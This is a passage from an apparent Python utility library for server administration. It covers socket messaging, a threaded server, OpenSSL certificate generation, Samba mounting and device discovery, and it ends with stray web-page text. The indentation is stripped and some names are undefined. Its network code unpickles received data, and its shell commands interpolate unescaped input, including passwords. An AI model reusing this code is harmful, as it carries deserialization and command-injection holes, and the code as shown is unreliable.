line='%s'%(ii)
NFLT=False
else:
line='%s%s'%(bspace,ii)
if rc_str is None:
rc_str='%s'%(line)
else:
rc_str='%s\n%s'%(rc_str,line)
else:
rc_str='%s%s'%(bspace,string)
if rc:
return rc_str
else:
print(rc_str)
def str_format_print(string,rc=False):
if type(string) is str:
if len(string.split("'")) > 1:
rc_str='"%s"'%(string)
else:
rc_str="'%s'"%(string)
else:
rc_str=string
if rc:
return rc_str
else:
print(rc_str)
def clear_version(string,sym='.'):
if isinstance(string,(int,str)):
if isinstance(string,str): string=string.strip()
string='{}'.format(string)
else:
return False
arr=string.split(sym)
for ii in range(len(arr)-1,0,-1):
if arr[ii].replace('0','') == '':
arr.pop(-1)
else:
break
return sym.join(arr)
def get_key(dic=None,find=None):
return find_key_from_value(dic=dic,find=find)
def find_key_from_value(dic=None,find=None):
if isinstance(dic,dict):
if find is None:
return list(dic.keys())
else:
for key,val in dic.items():
if val == find:
return key
elif isinstance(dic,list) or isinstance(dic,tuple):
if find is None:
return len(dic)
else:
if find in dic:
return dic.index(find)
def git_ver(git_dir=None):
if git_dir is not None and os.path.isdir('{0}/.git'.format(git_dir)):
gver=rshell('''cd {0} && git describe --tags'''.format(git_dir))
if gver[0] == 0:
return gver[1]
def load_kmod(modules,re_load=False):
if type(modules) is str:
modules=modules.split(',')
for ii in modules:
if re_load:
os.system('lsmod | grep {0} >& /dev/null && modprobe -r {0}'.format(ii.replace('-','_')))
os.system('lsmod | grep {0} >& /dev/null || modprobe --ignore-install {1} || modprobe {1} || modprobe -ib {1}'.format(ii.replace('-','_'),ii))
#os.system('lsmod | grep {0} >& /dev/null || modprobe -i -f {1}'.format(ii.split('-')[0],ii))
def reduce_string(string,symbol=' ',snum=0,enum=None):
if type(string) is str:
arr=string.split(symbol)
strs=None
if enum is None:
enum=len(arr)
for ii in range(snum,enum):
if strs is None:
strs='{0}'.format(arr[ii])
else:
strs='{0} {1}'.format(strs,arr[ii])
return strs
def findstr(string,find,prs=None,split_symbol='\n',patern=True):
# Patern return selection (^: First(0), $: End(-1), <int>: found item index)
found=[]
if not isinstance(string,str): return []
if split_symbol:
string_a=string.split(split_symbol)
else:
string_a=[string]
for nn in string_a:
if isinstance(find,(list,tuple)):
find=list(find)
else:
find=[find]
for ff in find:
if patern:
aa=re.compile(ff).findall(nn)
for mm in aa:
if isinstance(mm,tuple):
if prs == '^':
found.append(mm[0])
elif prs == '$':
found.append(mm[-1])
elif isinstance(prs,int):
found.append(mm[prs])
else:
found.append(mm)
else:
found.append(mm)
else:
find_a=ff.split('*')
if len(find_a[0]) > 0:
if find_a[0] != nn[:len(find_a[0])]:
chk=False
if len(find_a[-1]) > 0:
if find_a[-1] != nn[-len(find_a[-1]):]:
chk=False
for ii in find_a[1:-1]:
if ii not in nn:
chk=False
if chk:
found.append(nn)
return found
def find_cdrom_dev(size=None):
load_kmod(['sr_mod','cdrom','libata','ata_piix','ata_generic','usb-storage'])
if os.path.isdir('/sys/block') is False:
return
for r, d, f in os.walk('/sys/block'):
for dd in d:
for rrr,ddd,fff in os.walk(os.path.join(r,dd)):
if 'removable' in fff:
with open('{0}/removable'.format(rrr),'r') as fp:
removable=fp.read()
if '1' in removable:
if os.path.isfile('{0}/device/model'.format(rrr)):
with open('{0}/device/model'.format(rrr),'r') as fpp:
model=fpp.read()
for ii in ['CDROM','DVD-ROM','DVD-RW']:
if ii in model:
if size is None:
return '/dev/{0}'.format(dd)
else:
if os.path.exists('{}/size'.format(rrr)):
with open('{}/size'.format(rrr),'r') as fss:
block_size=fss.read()
dev_size=int(block_size) * 512
if dev_size == int(size):
return '/dev/{0}'.format(dd)
#def ipmi_sol(ipmi_ip,ipmi_user,ipmi_pass):
# if is_ipv4(ipmi_ip):
# rshell('''ipmitool -I lanplus -H {} -U {} -P {} sol info'''.format(ipmi_ip,ipmi_user,ipmi_pass))
#Set in progress : set-complete
#Enabled : true
#Force Encryption : false
#Force Authentication : false
#Privilege Level : OPERATOR
#Character Accumulate Level (ms) : 0
#Character Send Threshold : 0
#Retry Count : 0
#Retry Interval (ms) : 0
#Volatile Bit Rate (kbps) : 115.2
#Non-Volatile Bit Rate (kbps) : 115.2
#Payload Channel : 1 (0x01)
#Payload Port : 623
def net_send_data(sock,data,key='kg',enc=False,timeout=0):
if type(sock).__name__ in ['socket','_socketobject','SSLSocket'] and data and type(key) is str and len(key) > 0 and len(key) < 7:
start_time=TIME().Int()
# encode code here
if timeout > 0:
sock.settimeout(timeout)
nkey=_u_str2int(key)
pdata=pickle.dumps(data,protocol=2) # common 2.x & 3.x version : protocol=2
data_type=_u_bytes(type(data).__name__[0])
if enc and key:
# encode code here
#enc_tf=_u_bytes('t') # Now not code here. So, everything to 'f'
#pdata=encode(key,pdata)
enc_tf=_u_bytes('f')
else:
enc_tf=_u_bytes('f')
ndata=struct.pack('>IssI',len(pdata),data_type,enc_tf,nkey)+pdata
try:
sock.sendall(ndata)
return True,'OK'
except:
if timeout > 0:
#timeout=sock.gettimeout()
if TIME().Int() - start_time > timeout-1:
#Timeout
return False,'Sending Socket Timeout'
return False,'Sending Fail'
def net_receive_data(sock,key='kg',progress=None,retry=0,retry_timeout=30):
# decode code here
def recvall(sock,count,progress=False): # Packet
buf = b''
file_size_d=int('{0}'.format(count))
if progress: print('\n')
tn=0
newbuf=None
while count:
if progress:
sys.stdout.write('\rDownloading... [ {} % ]'.format(int((file_size_d-count) / file_size_d * 100)))
sys.stdout.flush()
try:
newbuf = sock.recv(count)
except socket.error as e:
if tn < retry:
print("[ERROR] timeout value:{} retry: {}/{}\n{}".format(sock.gettimeout(),tn,retry,e))
tn+=1
TIME().Sleep(1)
sock.settimeout(retry_timeout)
continue
if e == 'timed out':
return 'timeout',e
if not newbuf: return True,None #maybe something socket issue.
buf += newbuf
count -= len(newbuf)
if progress:
sys.stdout.write('\rDownloading... [ 100 % ]\n')
sys.stdout.flush()
return True,buf
ok,head=recvall(sock,10)
if krc(ok,chk=True):
if head:
try:
st_head=struct.unpack('>IssI',_u_bytes(head))
except:
return [False,'Fail for read header({})'.format(head)]
if st_head[3] == _u_str2int(key):
ok,data=recvall(sock,st_head[0],progress=progress)
if krc(ok,chk=True):
if st_head[2] == 't':
# decode code here
# data=decode(data)
pass
if data: return [st_head[1],pickle.loads(data)]
return [True,None]
else:
return [ok,data]
else:
return [False,'Wrong key']
return ['lost','Connection lost']
return ok,head
def net_put_and_get_data(IP,data,PORT=8805,key='kg',timeout=3,try_num=1,try_wait=[0,5],progress=None,enc=False,upacket=None,SSLC=False,log=True):
sent=False,'Unknown issue'
for ii in range(0,try_num):
if upacket: # Update packet function for number of try information ([#/<total #>])
data=upacket('ntry',[ii+1,try_num],data)
start_time=TIME().Int()
sock=net_get_socket(IP,PORT,timeout=timeout,SSLC=SSLC)
if try_num > 0:
rtry_wait=(timeout//try_num)+1
else:
rtry_wait=try_wait
sent=False,'Unknown issue'
try:
sent=net_send_data(sock,data,key=key,enc=enc)
except:
os.system("""[ -f /tmp/.{0}.{1}.crt ] && rm -f /tmp/.{0}.{1}.crt""".format(host,port))
if sent[0]:
nrcd=net_receive_data(sock,key=key,progress=progress)
return nrcd
else:
if timeout >0:
if TIME().Int() - start_time >= timeout-1:
return [False,'Socket Send Timeout']
#return [False,'Data protocol version mismatch']
if sock: sock.close()
if try_num > 1:
if log:
print('try send data ... [{}/{}]'.format(ii+1,try_num))
TIME().Sleep(try_wait)
return [False,'Send fail({}) :\n{}'.format(sent[1],data)]
def net_get_socket(host,port,timeout=3,dbg=0,SSLC=False): # host : Host name or IP
try:
af, socktype, proto, canonname, sa = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM)[0]
except:
print('Can not get network informatin of {}:{}'.format(host,port))
return False
try:
soc = socket.socket(af, socktype, proto)
if timeout > 0:
soc.settimeout(timeout)
except socket.error as msg:
print('could not open socket of {0}:{1}\n{2}'.format(host,port,msg))
return False
###### SSL Wrap ######
if SSLC:
for i in range(0,5):
icertfile='/tmp/.{}.{}.crt'.format(host,port)
try:
cert=ssl.get_server_certificate((host,port))
except:
os.system('rm -f /tmp/.{}.{}.crt'.format(host,port))
TIME().Sleep(1)
continue
f=open(icertfile,'w')
f.write(cert)
f.close()
TIME().Sleep(0.3)
try:
soc=ssl.wrap_socket(soc,ca_certs=icertfile,cert_reqs=ssl.CERT_REQUIRED)
soc.connect((host,port))
return soc
except socket.error as msg:
if dbg > 3:
print(msg)
TIME().Sleep(1)
########################
else:
try:
soc.connect(sa)
return soc
except socket.error as msg:
if dbg > 3:
print('can not connect at {0}:{1}\n{2}'.format(host,port,msg))
return False
def net_start_server(server_port,main_func_name,server_ip='',timeout=0,max_connection=10,log_file=None,certfile=None,keyfile=None):
ssoc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssoc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if timeout > 0:
ssoc.settimeout(timeout)
try:
ssoc.bind((server_ip, server_port))
except socket.error as msg:
print('Bind failed. Error : {0}'.format(msg))
os._exit(1)
ssoc.listen(max_connection)
print('Start server for {0}:{1}'.format(server_ip,server_port))
# for handling task in separate jobs we need threading
while True:
conn, addr = ssoc.accept()
ip, port = str(addr[0]), str(addr[1])
try:
if certfile and keyfile:
ssl_conn=ssl_wrap(conn,certfile,keyfile=keyfile)
Thread(target=main_func_name, args=(ssl_conn, ip, port, log_file)).start()
else:
Thread(target=main_func_name, args=(conn, ip, port, log_file)).start()
except:
print('No more generate thread for client from {0}:{1}'.format(ip,port))
ssoc.close()
def net_start_single_server(server_port,main_func_name,server_ip='',timeout=0,max_connection=10,log_file=None,certfile=None,keyfile=None):
ssoc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssoc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if timeout > 0:
ssoc.settimeout(timeout)
try:
ssoc.bind((server_ip, server_port))
except socket.error as msg:
print('Bind failed. Error : {0}'.format(msg))
os._exit(1)
ssoc.listen(max_connection)
print('Start server for {0}:{1}'.format(server_ip,server_port))
# for handling task in separate jobs we need threading
conn, addr = ssoc.accept()
ip, port = str(addr[0]), str(addr[1])
if certfile and keyfile:
ssl_conn=ssl_wrap(conn,certfile,keyfile=keyfile)
rc=main_func_name(ssl_conn, ip, port, log_file)
else:
rc=main_func_name(conn, ip, port, log_file)
ssoc.close()
return rc
def check_work_dir(work_dir,make=False,ntry=1,try_wait=[1,3]):
for ii in range(0,ntry):
if os.path.isdir(work_dir):
return True
else:
if make:
try:
os.makedirs(work_dir)
return True
except:
TIME().Sleep(try_wait)
return False
def get_node_info(loop=0):
host_ip=get_host_ip()
return {
'host_name':get_host_name(),
'host_ip':host_ip,
'host_mac':get_host_mac(ip=host_ip),
'ipmi_mac':get_ipmi_mac(loop=loop)[1],
'ipmi_ip':get_ipmi_ip()[1],
}
def kmp(mp={},func=None,name=None,timeout=0,quit=False,log_file=None,log_screen=True,log_raw=False, argv=[],queue=None):
# Clean
for n in [k for k in mp]:
if quit is True:
if n != 'log':
mp[n]['mp'].terminate()
if 'log' in mp:
mp['log']['queue'].put('\nterminate function {}'.format(n))
else:
if mp[n]['timeout'] > 0 and TIME().Int() > mp[n]['timeout']:
mp[n]['mp'].terminate()
if 'log' in mp:
mp['log']['queue'].put('\ntimeout function {}'.format(n))
if not mp[n]['mp'].is_alive():
del mp[n]
if quit is True and 'log' in mp:
mp['log']['queue'].put('\nterminate function log')
TIME().Sleep(2)
mp['log']['mp'].terminate()
return
# LOG
def logging(ql,log_file=None,log_screen=True,raw=False):
while True:
#if not ql.empty():
if ql.empty():
TIME().Sleep(0.01)
else:
ll=ql.get()
if raw:
log_msg=ll
else:
log_msg='{} : {}\n'.format(TIME().Now().strftime('%m-%d-%Y %H:%M:%S'),ll)
if type(log_msg) is not str:
log_msg='{}'.format(log_msg)
if log_file and os.path.isdir(os.path.dirname(log_file)):
with open(log_file,'a') as f:
f.write('{}'.format(log_msg))
if log_screen:
sys.stdout.write(log_msg)
sys.stdout.flush()
if 'log' not in mp or not mp['log']['mp'].is_alive():
#log=multiprocessing.Queue()
log=Queue()
#lqp=multiprocessing.Process(name='log',target=logging,args=(log,log_file,log_screen,log_raw,))
lqp=Process(name='log',target=logging,args=(log,log_file,log_screen,log_raw,))
lqp.daemon = True
mp.update({'log':{'mp':lqp,'start':TIME().Int(),'timeout':0,'queue':log}})
lqp.start()
# Functions
if func:
if name is None:
name=func.__name__
if name not in mp:
if argv:
#mf=multiprocessing.Process(name=name,target=func,args=tuple(argv))
mf=Process(name=name,target=func,args=tuple(argv))
else:
#mf=multiprocessing.Process(name=name,target=func)
mf=Process(name=name,target=func)
if timeout > 0:
timeout=TIME().Int()+timeout
# for aa in argv:
# if type(aa).__name__ == 'Queue':
# mp.update({name:{'mp':mf,'timeout':timeout,'start':now(),'queue':aa}})
if name not in mp:
if queue and type(queue).__name__ == 'Queue':
mp.update({name:{'mp':mf,'timeout':timeout,'start':TIME().Int(),'queue':queue}})
else:
mp.update({name:{'mp':mf,'timeout':timeout,'start':TIME().Int()}})
mf.start()
return mp
def key_remove_pass(filename):
rshell('openssl rsa -in {0}.key -out {0}.nopass.key'.format(filename))
def cert_file(keyfile,certfile,C='US',ST='CA',L='San Jose',O='KGC',OU='KG',CN=None,EMAIL=None,days=365,passwd=None,mode='gen'):
if keyfile is None and certfile is None:
return None,None
if mode == 'remove':
rc=rshell('openssl rsa -in {0} -out {0}.nopass'.format(keyfile))
if rc[0] == 0:
if os.path.isfile('{}'.format(certfile)):
return '{}.nopass'.format(keyfile),certfile
else:
return '{}.nopass.key'.format(keyfile),None
elif mode == 'gen' or (mode == 'auto' and (os.path.isfile(keyfile) is False or os.path.isfile(certfile) is False)):
if mode == 'gen':
os.system('''rm -f {}'''.format(certfile))
os.system('''rm -f {}'''.format(keyfile))
os.system('''rm -f {}.csr'''.format(keyfile))
subj=''
if C:
subj='{}/C={}'.format(subj,C)
if ST:
subj='{}/ST={}'.format(subj,ST)
if L:
subj='{}/L={}'.format(subj,L)
if O:
subj='{}/O={}'.format(subj,O)
if OU:
subj='{}/OU={}'.format(subj,OU)
if CN:
subj='{}/CN={}'.format(subj,CN)
if EMAIL:
subj='{}/emailAddress={}'.format(subj,EMAIL)
if subj:
subj=' -subj "{}"'.format(subj)
# gen
rc=(1,'error','error',0,0,'','')
if os.path.isfile(keyfile) is False:
if passwd:
# gen KEY
rc=rshell('openssl genrsa -aes256 -out {0} 2048'.format(keyfile))
else:
#print('openssl genrsa -out {0} 2048'.format(keyfile))
rc=rshell('openssl genrsa -out {0} 2048'.format(keyfile))
if (os.path.isfile(keyfile) and os.path.isfile(certfile) is False) or rc[0] == 0:
# gen CSR
os.system('''rm -f {}'''.format(certfile))
os.system('''rm -f {}.csr'''.format(keyfile))
rrc=rshell('openssl req -new -key {0} -out {0}.csr {1}'.format(keyfile,subj))
if rrc[0] == 0:
# gen cert
#print('openssl x509 -req -days {1} -in {0}.csr -signkey {0} -out {2}'.format(keyfile,days,certfile))
rrrc=rshell('openssl x509 -req -days {1} -in {0}.csr -signkey {0} -out {2}'.format(keyfile,days,certfile))
if rrrc[0] == 0:
# check
# print(rshell('openssl x509 -text -noout -in {}'.format(certfile))[1])
return keyfile,certfile
else:
key_file=None
crt_file=None
if os.path.isfile(keyfile):
key_file=keyfile
if os.path.isfile(certfile):
crt_file=certfile
return key_file,crt_file
return None,None
def rreplace(source_string, replace_what, replace_with):
head, _sep, tail = source_string.rpartition(replace_what)
return head + replace_with + tail
def net_put_data(IP,data,PORT=8805,key='kg',timeout=3,try_num=1,try_wait=[1,10],progress=None,enc=False,upacket=None,dbg=0,wait_time=3,SSLC=False):
sent=False,'Unknown issue'
for ii in range(0,try_num):
if upacket: # Update packet function for number of try information ([#/<total #>])
data=upacket('ntry',[ii+1,try_num],data)
sock=net_get_socket(IP,PORT,timeout=timeout,dbg=dbg,SSLC=SSLC)
if sock is False:
if dbg >= 3:
print('Can not get socket data [{}/{}], wait {}s'.format(ii+1,try_num,wait_time))
else:
sys.stdout.write('.')
sys.stdout.flush()
TIME().Sleep(wait_time)
continue
sent=False,'Unknown issue'
try:
sent=net_send_data(sock,data,key=key,enc=enc)
except:
print('send fail, try again ... [{}/{}]'.format(ii+1,try_num))
if sent[0]:
if sock:
sock.close()
return [True,'sent']
if try_num > 1:
wait_time=Random(length=0,strs=try_wait,mode='int')
if dbg >= 3:
print('try send data ... [{}/{}], wait {}s'.format(ii+1,try_num,wait_time))
TIME().Sleep(wait_time)
return [False,'Send fail({}) :\n{}'.format(sent[1],data)]
def encode(string):
enc='{0}'.format(string)
tmp=zlib.compress(enc.encode("utf-8"))
return '{0}'.format(base64.b64encode(tmp).decode('utf-8'))
def decode(string):
if type(string) is str:
dd=zlib.decompress(base64.b64decode(string))
return '{0}'.format(dd.decode("utf-8"))
return string
def mount_samba(url,user,passwd,mount_point):
if os.path.isdir(mount_point) is False:
os.system('sudo mkdir -p {0}'.format(mount_point))
TIME().Sleep(1)
if os.path.isdir(mount_point) is False:
return False,'can not make a {} directory'.format(mount_point),'can not make a {} directory'.format(mount_point),0,0,None,None
if 'smb://' in url:
url_a=url.split('/')
url_m=len(url_a)
iso_file=url_a[-1]
new_url=''
for i in url_a[2:url_m-1]:
new_url='{0}/{1}'.format(new_url,i)
rc=rshell('''sudo mount -t cifs -o user={0} -o password={1} /{2} {3}'''.format(user,passwd,new_url,mount_point))
if rc[0] == 0:
return True,rc[1]
else:
url_a=url.split('\\')
url_m=len(url_a)
iso_file=url_a[-1]
new_url=''
for i in url_a[1:url_m-1]:
new_url='{0}/{1}'.format(new_url,i)
rc=rshell('''sudo mount -t cifs -o user={0} -o password={1} {2} {3}'''.format(user,passwd,new_url,mount_point))
if rc[0] == 0:
return True,rc[1]
def umount(mount_point,del_dir=False):
rc=rshell('''[ -d {0} ] && sudo mountpoint {0} && sleep 1 && sudo umount {0} && sleep 1'''.format(mount_point))
if rc[0] == 0 and del_dir:
os.system('[ -d {0} ] && sudo rmdir {0}'.format(mount_point))
return rc
def is_xml(filename):
firstLine_i=FILE().Rw(filename,out='string',read='firstline')
if krc(firstLine_i,chk=True):
firstLine=get_value(firstLine_i,1)
else:
filename_str=_u_byte2str(filename)
if isinstance(filename_str,str):
firstLine=filename_str.split('\n')[0]
if isinstance(firstLine,str) and firstLine.split(' ')[0] == '<?xml':
return True
return False
def krc(rt,chk='_',rtd={'GOOD':[True,'True','Good','Ok','Pass',{'OK'},0],'FAIL':[False,'False','Fail',{'FAL'}],'NONE':[None,'None','N/A',{'NA'}],'IGNO':['IGNO','Ignore',{'IGN'}],'ERRO':['ERR','Error','error','erro','ERRO',{'ERR'}],'WARN':['Warn','warn',{'WAR'}],'UNKN':['Unknown','UNKN',{'UNK'}],'JUMP':['Jump',{'JUMP'}],'TOUT':['timeout','TimeOut','time out','Time Out','TMOUT','TOUT',{'TOUT'}],'REVD':['cancel','Cancel','CANCEL','REV','REVD','Revoked','revoked','revoke','Revoke',{'REVD'}],'LOST':['lost','connection lost','Connection Lost','Connection lost','CONNECTION LOST',{'LOST'}]},default=False):
def trans(irt):
type_irt=type(irt)
for ii in rtd:
for jj in rtd[ii]:
if type(jj) == type_irt and ((type_irt is str and jj.lower() == irt.lower()) or jj == irt):
return ii
return 'UNKN'
rtc=Get(rt,'0|rc',out='raw',err='ignore',check=(list,tuple,dict))
nrtc=trans(rtc)
if chk != '_':
if not isinstance(chk,list): chk=[chk]
for cc in chk:
if trans(cc) == nrtc:
return True
if nrtc == 'UNKN' and default == 'org':
return rtc
if default == 'org': return rt
return default
return nrtc
def replacestr(data,org,new):
if isinstance(data,str):
if not isinstance(org,str): org=_u_bytes2str(org)
if not isinstance(new,str): new=_u_bytes2str(new)
elif isinstance(data,bytes):
if not isinstance(org,bytes): org=_u_bytes(org)
if not isinstance(new,bytes): new=_u_bytes(new)
# if not isinstance(data,bytes):
# data=_u_bytes(data)
# if not isinstance(org,bytes):
# org=_u_bytes(org)
# if not isinstance(new,bytes):
# new=_u_bytes(new)
return data.replace(org,new)
def get_iso_uid(filename):
if type(filename) is not str:
return False,None,None
if os.path.exists(filename):
uid_cmd='''sudo /usr/sbin/blkid {}'''.format(filename)
rc=rshell(uid_cmd)
if rc[0] == 0:
uid_str='{0}_{1}'.format(findstr(rc[1],'UUID="(\w.*)" L')[0],findstr(rc[1],'LABEL="(\w.*)" T')[0]).replace(' ','_')
file_info=get_file(filename)
file_size=file_info.get('size',None)
return True,uid_str,file_size
return False,rc[1],None
return False,'{} not found'.format(filename),None
def find_usb_dev(size=None,max_size=None):
rc=[]
load_kmod(modules=['usb-storage'])
if os.path.isdir('/sys/block') is False:
return
for r, d, f in os.walk('/sys/block'):
for dd in d:
for rrr,ddd,fff in os.walk(os.path.join(r,dd)):
if 'removable' in fff:
removable=cat('{0}/removable'.format(rrr))
if removable:
if '1' in removable:
if size is None:
if max_size:
file_size=cat('{0}/size'.format(rrr))
if file_size:
dev_size=int(file_size) * 512
if dev_size <= int(max_size):
rc.append('/dev/{0}'.format(dd))
else:
rc.append('/dev/{0}'.format(dd))
else:
file_size=cat('{0}/size'.format(rrr))
if file_size:
dev_size=int(file_size) * 512
if dev_size == int(size):
rc.append('/dev/{0}'.format(dd))
return rc
def alive(out=None):
aa=rshell('uptime')
if aa[0] == 0:
aa_a=aa[1].split()
if len(aa_a) > 2:
if ':' in aa_a[2]:
if out in ['sec','second','seconds',int]:
bb_a=aa_a[2][:-1].split(':')
return int(bb_a[0])*3600+int(bb_a[1])*60
else:
return aa_a[2][:-1]+'h'
elif aa_a[3] == 'min,':
if out in ['sec','second','seconds',int]:
return int(aa_a[2])*60
else:
return aa_a[2]+'m'
else:
if out in ['sec','second','seconds',int]:
if ':' in aa_a[4]:
bb_a=aa_a[4][:-1].split(':')
return int(aa_a[2])*(24*3600)+int(bb_a[0])*3600+int(bb_a[1])*60
else:
if aa_a[5] == 'min,':
return int(aa_a[2])*(24*3600)+int(aa_a[4])*60
else:
return int(aa_a[2])*(24*3600)+int(aa_a[4])
else:
return aa_a[2]+'d'
if out in ['sec','second','seconds',int]:
return -1
else:
return 'unknown'
class Multiprocessor():
def __init__(self):
self.processes = []
self.queue = Queue()
@staticmethod
def _wrapper(func, queue, args, kwargs):
ret = func(*args, **kwargs)
queue.put(ret)
def run(self, func, *args, **kwargs):
args2 = [func, self.queue, args, kwargs]
p = Process(target=self._wrapper, args=args2)
self.processes.append(p)
p.start()
def wait(self):
rets = []
for p in self.processes[:]:
ret = self.queue.get()
rets.append(ret)
self.processes.remove(p)
return rets
def ddict(*inps,**opts):
out={}
for ii in inps:
if isinstance(ii,dict):
out.update(ii)
if opts:
out.update(opts)
return out
def fdict(src,keys):
if isinstance(src,dict) and isinstance(keys,list):
new_out={}
for kk in keys:
new_out[kk]=src.get(kk)
return new_out
def pipe_msg(**opts):
m={}
if not pipe_file: return False
if os.path.isfile(pipe_file):
with open(pipe_file,'rb') as f:
m=pickle.load(f)
if opts:
m.update(opts)
with open(pipe_file,'wb') as f:
pickle.dump(m,f, protocol=pickle.HIGHEST_PROTOCOL)
else:
return m
def Try(cmd):
try:
return True,cmd
except:
e=sys.exc_info()[0]
return False,{'err':e}
def FixIndex(src,idx,default=0):
if isinstance(src,(list,tuple,str,dict)) and isinstance(idx,int):
if idx < 0:
if len(src) > abs(idx):
idx=len(src)-abs(idx)
else:
idx=0
else:
if len(src) <= idx: idx=len(src)-1
return idx
return default
def Next(src,step=0,out=None,default='org'):
if isinstance(src,(list,tuple,dict)):
step=FixIndex(src,step)
iterator=iter(src)
for i in range(-1,step):
rt=next(iterator)
return OutFormat(rt,out=out)
elif isinstance(src,str):
step=FixIndex(src,step)
if len(src) == 0:
return ''
elif len(src) >= 0 or len(src) <= step:
return OutFormat(src[step],out=out)
if default == 'org': return src
OutFormat(default,out=out)
def Timeout(timeout_sec,init_time=None,default=(24*3600)):
if timeout_sec == 0: return True,0
init_time=integer(init_time,default=0)
timeout_sec=integer(timeout_sec,default=default)
if init_time == 0:
init_time=TIME().Int()
if timeout_sec == 0:
return False,init_time
if timeout_sec < 3:
timeout_sec=3
if TIME().Int() - init_time > timeout_sec:
return True,init_time
return False,init_time
#################################################################
def Wrap(src,space='',space_mode='space',sym='\n',default=None,NFLT=False,out=str):
return STR(src).Wrap(space=space,space_mode=space_mode,sym=sym,default=default,NFLT=NFLT,out=out)
def Split(src,sym,default=None):
return STR(src).Split(sym,default=default)
def screen_kill(self,title):
return SCREEN().Kill(title)
def screen_monitor(title,ip,ipmi_user,ipmi_pass,find=[],timeout_sec=600):
return SCREEN().Monitor(title,ip,ipmi_user,ipmi_pass,find=find,timeout=timeout_sec)
def screen_id(title=None):
return SCREEN().Id(title)
def screen_logging(title,cmd):
return SCREEN().Log(title,cmd)
def mac2str(mac,case='lower'):
return MAC(mac).ToStr(case=case)
def str2mac(mac,sym=':',case='lower',chk=False):
return MAC(mac).FromStr(case=case,sym=sym,chk=chk)
def is_mac4(mac=None,symbol=':',convert=True):
return MAC(mac).IsV4(symbol=symbol)
def rshell(cmd,timeout=None,ansi=True,path=None,progress=False,progress_pre_new_line=False,progress_post_new_line=False,log=None,progress_interval=5):
return SHELL().Run(cmd,timeout=timeout,ansi=ansi,path=path,progress=progress,progress_pre_new_line=progress_pre_new_line,progress_post_new_line=progress_post_new_line,log=log,progress_interval=progress_interval)
def gen_random_string(length=8,letter='*',digits=True,symbols=True,custom=''):
mode='alpha'
if digits:mode=mode+'num'
if symbols:mode=mode+'char'
return Random(length=length,strs=custom,mode=mode,letter=letter)
def string2data(string,default='org',want_type=None):
return CONVERT(string).Ast(default=default,want_type=want_type)
def str2url(string):
return WEB().str2url(string)
def is_bmc_ipv4(ipaddr,port=(623,664,443)):
return IP(ipaddr).IsBmcIp(port=port)
def is_port_ip(ipaddr,port):
return IP(ipaddr).IsOpenPort(port)
def ipv4(ipaddr=None,chk=False):
return IP(ipaddr).V4(out='str',default=False)
def ip_in_range(ip,start,end):
return IP(ip).InRange(start,end)
def is_ipv4(ipaddr=None):
return IP(ipaddr).IsV4()
def ip2num(ip):
return IP(ip).Ip2Num()
def web_server_ip(request):
web=WEB(request)
return web.ServerIp()
def web_client_ip(request):
web=WEB(request)
return web.ClientIp()
def web_session(request):
web=WEB(request)
return web.Session()
def web_req(host_url=None,**opts):
return WEB().Request(host_url,**opts)
def logging(*msg,**opts):
return printf(*msg,**opts)
def is_py3():
return PyVer(3)
def get_value(src,key=None,default=None,check=[str,list,tuple,dict],err=False):
return Get(src,key,default=default,check=check,err=err)
def file_rw(name,data=None,out='string',append=False,read=None,overwrite=True):
return FILE().Rw(name,data=data,out=out,append=append,read=read,overwrite=overwrite,finfo={})
def rm_file(filelist):
return FILE().Rm(filelist)
def append2list(*inps,**opts):
return LIST(inps[0]).Append(*inps[1:],**opts)
def sizeConvert(sz=None,unit='b:g'):
return CONVERT(sz).Size(unit=unit)
def list2str(arr):
return Join(arr,symbol=' ')
def _u_str2int(val,encode='utf-8'):
return BYTES(val).Str2Int(encode)
def _u_bytes(val,encode='utf-8'):
return BYTES(encode=encode).From(val)
def _u_bytes2str(val,encode='latin1'):
return BYTES(val).Str(encode=encode)
def _u_byte2str(val,encode='latin1'):
return _u_bytes2str(val,encode=encode)
def CompVersion(src,compare_symbol,dest,compare_range='dest',version_symbol='.'):
return VERSION().Compare(src,compare_symbol,dest,compare_range=compare_range,version_symbol=version_symbol)
def Int(i,default={'org'}):
return CONVERT(i).Int(default=default)
def Lower(src):
if isinstance(src,str): return src.lower()
return src
def sendanmail(to,subj,msg,html=True):
Email=EMAIL()
Email.Send(to,sender='root@sumtester.supermicro.com',title=subj,msg=msg,html=html)
def mktemp(filename=None,suffix='-XXXXXXXX',opt='dry',base_dir='/tmp'):
return FILE().MkTemp(filename=filename,suffix=suffix,opt=opt,base_dir=base_dir)
def check_version(a,sym,b):
return VERSION().Check(a,sym,b)
def Pwd(cwd=None):
return FILE().Path(cwd)
def get_my_directory(cwd=None):
return FILE().Path(cwd)
def IsSame(src,chk_val,sense=False):
return IS().Same(src,chk_val,sense=sense)
def move2first(item,pool):
return LIST(pool).Move2first(item)
def now():
return TIME().Int()
def int_sec():
return TIME().Int()
def clean_ansi(src):
return ANSI().Clean(src)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.